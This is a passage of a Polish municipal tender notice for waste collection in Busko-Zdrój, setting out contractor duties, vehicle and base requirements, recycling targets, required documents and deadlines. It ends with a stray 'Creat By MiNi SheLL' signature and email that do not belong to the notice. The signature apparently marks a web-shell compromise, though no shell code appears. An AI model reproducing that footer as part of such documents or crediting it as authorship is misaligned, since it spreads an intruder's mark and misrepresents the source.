Dokumentację dotyczącą stwierdzenia niezgodności wykonawca przekazuje Zamawiającemu drogą pisemną i elektroniczną wraz z miesięcznymi raportami.
14)  odbioru  odpadów niebezpiecznych, odpadów wielkogabarytowych oraz zużytego sprzętu RTV i AGD, które zostaną wystawione przez mieszkańców zgodnie z uzgodnionym z Zamawiającym harmonogramem, z uwzględnieniem:
a) zbierania ich osobnymi transportami;
b) rozpoczęcia zbiórki sprzętu RTV i AGD w pierwszej kolejności w celu zapobieżenia jego demontażu i dodatkowego zaśmiecenia terenu;
c) zabezpieczenia przewożonych odpadów przed rozsypywaniem oraz w sposób gwarantujący bezpieczeństwo ruchu drogowego.
15) przekazania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do instalacji regionalnych w regionie V, określonych w Uchwale Nr XXI/361/12 Sejmiku Województwa Świętokrzyskiego z dnia 28 czerwca 2013 r. (z późn. zm.) w sprawie wykonania *Planu gospodarki odpadami komunalnymi dla województwa świętokrzyskiego* 2012-2018;
16)  przekazywania odebranych od właścicieli nieruchomości zamieszkałych selektywnie zebranych odpadów komunalnych do  instalacji  odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art.17 ustawy z dnia 14 grudnia 2012r. o odpadach (Dz.U. z 2013 poz 21z późn. zm.) lub samodzielnego zagospodarowania zgodnie z obowiązującymi przepisami,
17) prowadzenia kart ewidencji odpadów zgodnie z obowiązującymi przepisami.
18) zagospodarowania odebranych odpadów komunalnych w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz 645) poziomów recyklingu, przygotowania do ponownego użycia i odzysku następujących frakcji
odpadów: papier, metal, tworzywa sztuczne i szkło,
a) w roku 2016 - co najmniej 18%;
b) w roku 2017 - co najmniej 20%;
c) w roku 2018 - co najmniej 30 %;
d) osiągnięte przez wykonawcę poziomy recyklingu, przygotowania do ponownego użycia i odzysku obliczone będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2012 r. poz 654);
e) obliczanie poziomów recyklingu, przygotowania do ponownego użycia i odzysku oraz weryfikacja osiągniętych przez wykonawcę poziomów recyklingu wykonywane będzie przez Zamawiającego na podstawie przesłanych półrocznych sprawozdań przekazywanych przez wykonawcę, spełniających wymogi Rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630).
19)  przekazywania Zamawiającemu miesięcznych raportów zawierających:
a) informacje o ilości odebranych odpadów zebranych w sposób selektywny [Mg];
b) informacje o ilości odebranych odpadów zebranych w sposób zmieszany [Mg];
c) informacje o ilości odebranych odpadów biodegradowalnych [Mg];
d) informacje o liczbie i rodzaju wydanych nowych pojemników oraz worków (w formie tabelarycznej z wyszczególnieniem adresu, pod który je dostarczono);
e) wykaz nieruchomości, z których zostały odebrane odpady komunalne zebrane w sposób selektywny lub zmieszany.
Raporty, o których mowa muszą być przekazane w formie papierowej wraz z fakturą wystawioną przez wykonawcę za wykonaną usługę. Raporty miesięczne będą podstawą do rozliczenia faktury.
4. Ponadto do obowiązków wykonawcy w szczególności należy:
1. wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami ustawy Prawo ochrony środowiska (Dz.U. z 2013 poz. 1232 z późn. zm.) oraz rozporządzeniem wydanym na podstawie art. 9d ust. 2 ustawy z dnia 13 września 2012 r. o utrzymaniu czystości
i porządku w gminach (tj. Dz. U. z 2013 r. poz.1399 z późn. zm);
2. zapewnienie przez cały okres realizacji zamówienia w uzgodnieniu z Zamawiającym systemu monitorowania pracy sprzętu obejmującego:
a) bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i ich komunikowanie się z nimi w dowolnym momencie odczytu ww. danych; pamięć danych powinna być przechowywana i odczytywalna minimum przez okres 30 dni, przy czym odczytanie danych nie może powodować kasowania zawartości urządzenia monitorującego;
b) odwzorowanie aktualnej pozycji i przebytej trasy pojazdu na cyfrowej mapie miasta i gminy Busko-Zdrój, z dokładnością umożliwiającą jednoznaczne określenie miejsca (adresu) wykonywania pracy;
c) odtwarzanie i analizę *historii* pracy sprzętu z okresu realizacji umowy oraz prowadzenie jej rozliczania na podstawie danych odczytanych z urządzeń monitorujących pracę sprzętu.
3. utrzymywanie i wyposażenie stanowiska dyspozytorskiego w odpowiedni sprzęt komputerowy i telekomunikacyjny umożliwiający wykonanie funkcji opisanych w pkt 2, a także zapewnienie nieprzerwanego dostępu Zamawiającemu w dowolnym czasie do danych opisanych w pkt 2 poprzez sieć internetową.
4. wyposażenie stanowiska dyspozytora w niezbędne dla funkcjonowania systemu elementy zapewniające ciągłą i niezawodną pracę, w szczególności w zasilanie awaryjne typu UPS umożliwiające pracę systemu przez min. 1 godzinę po zaniku napięcia w sieci energetycznej.
5. wyposażenie Zamawiającego na czas trwania umowy w oprogramowanie zainstalowane na  stanowisku komputerowym będącym własnością Zamawiającego obsługującym gminę Busko-Zdrój poprzez:
a) bieżącą kontrolę pracy sprzętu wykorzystywanego przez wykonawcę do wykonania usług związanych z odbieraniem i zagospodarowaniem odpadów komunalnych, z odwzorowaniem na monitorze na aktualnej cyfrowej mapie miasta i gminy Busko-Zdrój miejsca prowadzenia prac;
c)  odczyt i analizę danych bezpośrednio z urządzeń monitorujących zamontowanych na sprzęcie, za pośrednictwem sieci internetowej z komputera bazowego (serwera);
d) codzienne archiwizowanie danych.
6. przeszkolenie osób wybranych przez Zamawiającego w ilości wskazanej przez
Zamawiającego w zakresie obsługi oprogramowania, o którym mowa w punkcie 5; szkolenie musi odbyć się w siedzibie Zamawiającego.
7. wykonanie przedmiotu umowy w sposób sprawny, ograniczający do minimum utrudnienia w ruchu drogowym, korzystaniu z nieruchomości oraz niedogodności dla mieszkańców gminy Busko-Zdrój.
8. zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, jak również odpowiedniego personelu.
9. dokonanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych będzie utrudniony z przyczyn niezależnych od Zamawiającego i właściciela nieruchomości, w takich przypadkach wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
10. okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa.
11. ponoszenie odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy w zakresie określonym w Kodeksie cywilnym i innych ustawach.
5. Wykonawca ubiegający się o realizację zamówienia jest zobowiązany:
1. Posiadać bazę magazynowo-transportową, do której ma tytuł prawny, usytuowaną w gminie Busko-Zdrój  lub w odległości nie większej niż 60 km od jej granic, która jest wyposażona w:
a) miejsca do parkowania pojazdów;
b) pomieszczenia socjalne dla pracowników;
c)  miejsca do magazynowania selektywnie zebranych odpadów;
d) legalizowaną samochodową wagę najazdową w przypadku, gdy na terenie bazy następuje magazynowanie odpadów;
e)  punkt bieżącej konserwacji i naprawy pojazdów;
f) miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem  bazy magazynowo-transportowej.
2. Ponadto powinien:
a) zabezpieczyć teren bazy materiałowo - transportowej przed wstępem osób nieuprawnionych;
b) zabezpieczyć miejsca parkowania samochodów przed emisją zanieczyszczeń do gruntu;
c) zabezpieczyć miejsca gromadzenia selektywnie zebranych odpadów komunalnych przed emisją zanieczyszczeń do gruntu oraz zabezpieczyć je przed działaniem czynników atmosferycznych a także utrzymywać we właściwym stanie sanitarno - technicznym;
d) wyposażyć teren bazy w urządzenia odprowadzające wody opadowe i ścieki przemysłowe w/g ustawy prawo wodne (Dz. U. z 2015 r. poz. 469 z późn. zm.);
e) posiadać co najmniej 2 pojazdy przystosowane do odbierania selektywnie zebranych odpadów, a także co najmniej 2 pojazdy do odbierania zmieszanych odpadów komunalnych oraz co najmniej 1 bramowiec do transportu kontenerów KP-7 i co najmniej 2 samochody do odbioru  odpadów bez funkcji kompaktującej; 
f) po zakończonej pracy opróżniać pojazdy z odpadów i parkować pojazdy każdego dnia wyłącznie na terenie bazy;
g) zapewnić spełnienie przez pojazdy następujących wymagań:
-  pojazdy muszą być zabezpieczone przed rozwiewaniem i rozpylaniem przewożonych odpadów,
- pojazdy muszą być wyposażone w monitoring oparty na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju,
- pojazdy muszą być wyposażone w czujniki zapisujące dane o miejscach wyładunku odpadów umożliwiające weryfikację tych danych,
- pojazdy muszą posiadać narzędzia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
- dopuszcza się wyposażenie pojazdów w urządzenia do ważenia odpadów,
- pojazdy muszą być zarejestrowane i dopuszczone do ruchu  pojazdów oraz muszą posiadać  aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami ustawy o ruchu drogowym,
- pojazdy muszą być trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi i numerem telefonu podmiotu odbierającego odpady.
6. Odpowiedzialność wykonawcy
1. Wykonawca odpowiedzialny jest za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U z 2013 r., poz. 1399 z póź. zm), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r., poz. 645), oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012 r., poz. 676).
2. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający w okresie trzech lat od udzielenia zamówienia podstawowego przewiduje udzielenie zamówień uzupełniających o wartości nieprzekraczającej 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.13.00-5, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże posiadanie:
a) zezwolenia na prowadzenie działalności w zakresie zbierania i transportu odpadów komunalnych od właścicieli nieruchomości bądź pozwolenia zintegrowanego, uwzględniającego zbieranie i transport odpadów, wydanych w formie decyzji,
b) wpisu do rejestru działalności regulowanej w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Burmistrza Miasta i Gminy     Busko-Zdrój jako organu właściwego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 głównej usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia tzn.:
zamówienia polegającego na odbiorze odpadów komunalnych o łącznej masie minimum 3 500 Mg w okresie maksymalnie 12 następujących po sobie (kolejnych) miesięcy
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że przy realizacji zamówienia będzie dysponował:
1. samochodami specjalistycznymi o ładowności minimum 5 Mg do odbioru odpadów zmieszanych - min. 2 szt.
2. samochodami specjalistycznymi o ładowności minimum 1,5 Mg do odbioru selektywnie zebranych odpadów - min. 2 szt.
3. samochodem typu bramowiec do transportu kontenerów KP-7 - min. 1 szt.
4. samochodami do odbioru odpadów bez funkcji kompaktującej - min. 2 szt.
wraz z podaniem informacji o tytule dysponowania wymienionym sprzętem,
oraz
5. posiada bazę magazynowo - transportową, do której ma tytuł prawny, usytuowaną w gminie Busko-Zdrój lub w odległości nie większej niż 60 km od granic gminy Busko-Zdrój</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum  500.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Odległość bazy magazynowo - transportowej od granic miasta Busko - Zdrój - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje okoliczności i warunki zmiany postanowień zawartej umowy w przypadku:
1) zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania i zagospodarowania odpadów;
2)  zmiany sposobu spełnienia świadczenia
- pojawienie się nowszej technologii wykonania przedmiotu umowy pozwalającej na zaoszczędzenie czasu realizacji umowy lub jego kosztów
- zmiana zakresu usług przez wprowadzenie zmian w wykazie, o którym mowa w § 1 ust. 6 umowy
3) zmian osobowych i danych teleadresowych:
- zmiana osób, o których mowa w § 6 umowy,
- zmiana danych teleadresowych i numerów konta,
- zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy,
- zmiana umowy na skutek zmiany formy organizacyjno-prawnej, przekształcenia lub połączenia wykonawcy lub Zamawiającego;
4) płatności
- zmiany terminów płatności wynikające z wszelkich zmian wprowadzanych do Umowy o ile nie spowodują konieczności zapłaty odsetek lub zwiększenia wynagrodzenia wykonawcy
- wynagrodzenie wykonawcy, o którym mowa w § 2 ust. 1 umowy może ulec zmianie w przypadku wystąpienia urzędowej zmiany stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com